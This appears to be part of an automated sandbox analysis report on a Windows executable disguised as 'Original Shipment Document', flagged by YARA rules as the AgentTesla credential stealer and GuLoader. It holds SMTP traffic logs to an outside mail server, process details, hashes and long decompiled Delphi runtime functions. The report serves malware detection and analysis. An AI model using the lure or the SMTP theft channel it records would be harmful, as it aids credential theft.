Nov 19, 2020 08:27:17.859230042 CET	216.58.215.225	443	192.168.2.5	49728	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 19, 2020 08:27:56.979237080 CET	587	49736	110.4.45.145	192.168.2.5	220-rendang.mschosting.com ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 15:27:56 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 19, 2020 08:27:56.979701996 CET	49736	587	192.168.2.5	110.4.45.145	EHLO 701188
Nov 19, 2020 08:27:57.151947975 CET	587	49736	110.4.45.145	192.168.2.5	250-rendang.mschosting.com Hello 701188 [185.32.222.106] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 19, 2020 08:27:57.152362108 CET	49736	587	192.168.2.5	110.4.45.145	STARTTLS
Nov 19, 2020 08:27:57.324135065 CET	587	49736	110.4.45.145	192.168.2.5	220 TLS go ahead
Nov 19, 2020 08:28:56.490942955 CET	587	49736	110.4.45.145	192.168.2.5	421 rendang.mschosting.com lost input connection
Nov 19, 2020 08:28:57.983675003 CET	587	49740	110.4.45.145	192.168.2.5	220-rendang.mschosting.com ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 15:28:57 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 19, 2020 08:28:57.983850002 CET	49740	587	192.168.2.5	110.4.45.145	EHLO 701188
Nov 19, 2020 08:28:58.152666092 CET	587	49740	110.4.45.145	192.168.2.5	250-rendang.mschosting.com Hello 701188 [185.32.222.106] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 19, 2020 08:28:58.152821064 CET	49740	587	192.168.2.5	110.4.45.145	STARTTLS
Nov 19, 2020 08:28:58.324903011 CET	587	49740	110.4.45.145	192.168.2.5	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Original Shipment Document.exe PID: 4072 Parent PID: 5688

General

Start time:	08:26:50
Start date:	19/11/2020
Path:	C:\Users\user\Desktop\Original Shipment Document.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Original Shipment Document.exe'
Imagebase:	0x400000
File size:	707584 bytes
MD5 hash:	857D9DEAF0FAD01A7EC5DD82834D43BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Analysis Process: Original Shipment Document.exe PID: 5852 Parent PID: 4072

General

Start time:	08:26:50
Start date:	19/11/2020
Path:	C:\Users\user\Desktop\Original Shipment Document.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Original Shipment Document.exe'
Imagebase:	0x400000
File size:	707584 bytes
MD5 hash:	857D9DEAF0FAD01A7EC5DD82834D43BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: Original Shipment Document.exe PID: 5240 Parent PID: 5852

General

Start time:	08:27:08
Start date:	19/11/2020
Path:	C:\Users\user\Desktop\Original Shipment Document.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Original Shipment Document.exe'
Imagebase:	0x400000
File size:	707584 bytes
MD5 hash:	857D9DEAF0FAD01A7EC5DD82834D43BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.332753801.000000001F789000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: Original Shipment Document.exe PID: 1848 Parent PID: 5240

General

Start time:	08:27:34
Start date:	19/11/2020
Path:	C:\Users\user\Desktop\Original Shipment Document.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Original Shipment Document.exe'
Imagebase:	0x400000
File size:	707584 bytes
MD5 hash:	857D9DEAF0FAD01A7EC5DD82834D43BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.500431770.0000000000AE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.499678365.0000000000459000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.499467401.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Agenttesla_Smtp_Variant, Description: Yara detected Agent Tesla Trojan, Source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, Author: Joe Security Rule: agenttesla_smtp_variant, Description: unknown, Source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1! Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.500366577.0000000000A90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.500615250.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: Original Shipment Document.exe PID: 4072 Parent PID: 5688 Original Shipment Document.exeCOMMON

Executed Functions

Function 00405C78, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405C78(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405d7d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AC0( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EE4, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405D84);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401310();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401318();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401310();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401310();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401310();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

0x00405c79
0x00405c7b
0x00405c83
0x00405c94
0x00405c99
0x00405cb2
0x00405cb9
0x00405cfb
0x00405cfd
0x00405cfe
0x00405d03
0x00405d06
0x00405d09
0x00405d1b
0x00405d3e
0x00405d5e
0x00405d5e
0x00405d62
0x00405d68
0x00405d6b
0x00405d6e
0x00405d7c
0x00405cbb
0x00405cd0
0x00405cd7
0x00000000
0x00405cd9
0x00405cee
0x00405cf5
0x00405d84
0x00405d8c
0x00405d93
0x00405d94
0x00405da7
0x00405dac
0x00405db5
0x00405dcb
0x00405dd1
0x00405dd2
0x00405ddf
0x00405de4
0x00405de3
0x00405de3
0x00405df3
0x00405dfb
0x00405e01
0x00405e06
0x00405e13
0x00405e17
0x00405e18
0x00405e19
0x00405e2e
0x00405e2e
0x00405e32
0x00405e4b
0x00405e4f
0x00405e50
0x00405e51
0x00405e61
0x00405e66
0x00405e6a
0x00405e6c
0x00405e81
0x00405e85
0x00405e86
0x00405e87
0x00405e97
0x00405e9c
0x00405e9c
0x00405e6a
0x00405e32
0x00405dfb
0x00405ea5
0x00000000
0x00000000
0x00000000
0x00405cf5
0x00405cd7

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001,00410470,00405AA4,00406550,0000FF99,?), ref: 00405C94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C), ref: 00405CD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97

Strings

Software\Borland\Locales, xrefs: 00405CA8, 00405CC6
Software\Borland\Delphi\Locales, xrefs: 00405CE4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
Instruction ID: 50d7fcff162f8a2787b95d462eaa17d1600671633a99a01d037d82dc5577e201
Opcode Fuzzy Hash: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
Instruction Fuzzy Hash: 11514B71A4060C7AFB25D6A4CC46FEF76ACDB04744F4040B7BA44F65C1EA789A448FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00457EFC, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 392
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00457EFC(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x45858c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E00457DB0(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E00459E54(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E00457E74(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E00458AF8(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00458A9C(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044FE3C(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00458FDC(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043F370(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043F370(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043F370(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x471b18 = 0;
											_t206 = GetFocus();
											SetFocus(E0043F370(_t367));
											E00439EA4(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x471b18 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E00458974(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E004585F0(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E004586A0(_v8);
								} else {
									E00457E74(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E004585D4(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BB68("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x48fc00; // 0x2130f1c
							E00457418(_t267);
							E00457E74(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x48e808; // 0x48fb64
							E00443BBC( *_t271, _t312,  *(_v12 + 4));
							E00457E08(_v8, _t303, _t312, _v12, _t365);
							E00457E74(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E00457E74(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00457D04();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00457D14(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00457FA0))) {
						case 0:
							__eax = E0041BC00();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407050();
							__eax = E00457E74(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E00457E74(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044FCEC( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00457D0C();
							} else {
								_v8 = E00457D14(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E00457E74(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00406FB0();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00457E74(__ebp);
							} else {
								__eax = E00457EB0(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00455680(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E00457E74(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E004140D0( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}

0x00457efc
0x00457f03
0x00457f05
0x00457f08
0x00457f0d
0x00457f0e
0x00457f13
0x00457f16
0x00457f1e
0x00457f2d
0x00457f30
0x00457f64
0x00457f6a
0x00457f72
0x00457f74
0x00457f76
0x00457f79
0x0045802d
0x00458032
0x00458078
0x0045807d
0x0045809e
0x0045809e
0x004580a3
0x00458510
0x00458513
0x00458517
0x00458533
0x00458519
0x00458525
0x00458525
0x00458582
0x00458582
0x00458584
0x00458587
0x00000000
0x00458587
0x004580ac
0x004580af
0x0045836e
0x004580b5
0x0045857b
0x0045857c
0x00458581
0x00000000
0x004580af
0x0045807f
0x004584da
0x004584dd
0x004584e1
0x00458509
0x004584e3
0x004584f1
0x004584f1
0x00000000
0x004584e1
0x00458085
0x00458085
0x0045808a
0x00458488
0x0045848d
0x0045848f
0x00458495
0x0045849a
0x0045849d
0x004584a0
0x004584a8
0x004584ad
0x004584af
0x004584b6
0x004584b6
0x004584af
0x004584a0
0x00000000
0x0045848f
0x00458090
0x00458093
0x004584c0
0x004584d0
0x00000000
0x00458099
0x00000000
0x00458099
0x00458093
0x00458034
0x0045839b
0x0045839e
0x004583a0
0x004583a6
0x004583aa
0x004583af
0x004583b1
0x004583bf
0x004583c4
0x004583c6
0x004583d4
0x004583d9
0x004583db
0x004583e1
0x004583e8
0x004583f7
0x00458410
0x00458416
0x0045841b
0x00458425
0x00458425
0x004583db
0x004583c6
0x004583b1
0x00000000
0x004583a0
0x0045803a
0x0045803f
0x0045805f
0x0045805f
0x00458064
0x00458459
0x0045845c
0x00458464
0x00458476
0x00458476
0x00000000
0x00458464
0x0045806a
0x0045806d
0x0045837c
0x00458381
0x00458383
0x0045838c
0x0045838c
0x00000000
0x00458073
0x00000000
0x00458073
0x0045806d
0x00458041
0x00458431
0x00458434
0x0045843c
0x0045844e
0x0045844e
0x00000000
0x0045843c
0x00458047
0x00458047
0x0045804c
0x004580c5
0x004580c5
0x004580ca
0x004580d8
0x004580cc
0x004580cc
0x004580d1
0x004580e5
0x004580d3
0x004580f0
0x004580f5
0x004580d1
0x00000000
0x004580ca
0x00458051
0x00458054
0x0045827d
0x00000000
0x0045805a
0x00000000
0x0045805a
0x00458054
0x00457f7f
0x00000000
0x00000000
0x00457f85
0x00457f88
0x00457ff4
0x00457ff7
0x00458016
0x00458016
0x00458019
0x0045815b
0x00000000
0x0045815b
0x0045801f
0x00458022
0x004582a1
0x004582a7
0x004582ad
0x004582b3
0x004582b6
0x004582bd
0x004582c3
0x004582c6
0x004582cd
0x0045834d
0x004582cf
0x004582de
0x004582e3
0x004582e9
0x004582eb
0x00458335
0x0045833d
0x004582ed
0x004582f2
0x00458309
0x0045830b
0x0045830d
0x0045830f
0x00458318
0x00458326
0x00458326
0x0045830f
0x004582eb
0x004582cd
0x004582bd
0x00000000
0x00458028
0x00000000
0x00458028
0x00458022
0x00457ff9
0x00458561
0x00458566
0x0045856c
0x00000000
0x00458571
0x00457fff
0x00457fff
0x00458002
0x00458541
0x00458548
0x00458553
0x00458559
0x00000000
0x0045855e
0x00458008
0x0045800b
0x00458185
0x0045818b
0x0045818e
0x00458192
0x00458198
0x0045819e
0x004581a1
0x004581a5
0x004581cc
0x004581e1
0x004581a7
0x004581aa
0x004581bf
0x004581bf
0x00000000
0x00458011
0x00000000
0x00458011
0x0045800b
0x00457f8a
0x00458285
0x00458288
0x0045828c
0x00458295
0x00458295
0x00000000
0x0045828c
0x00457f90
0x00457f93
0x00000000
0x00000000
0x00457f99
0x00000000
0x00458574
0x00000000
0x00000000
0x00000000
0x00000000
0x00458163
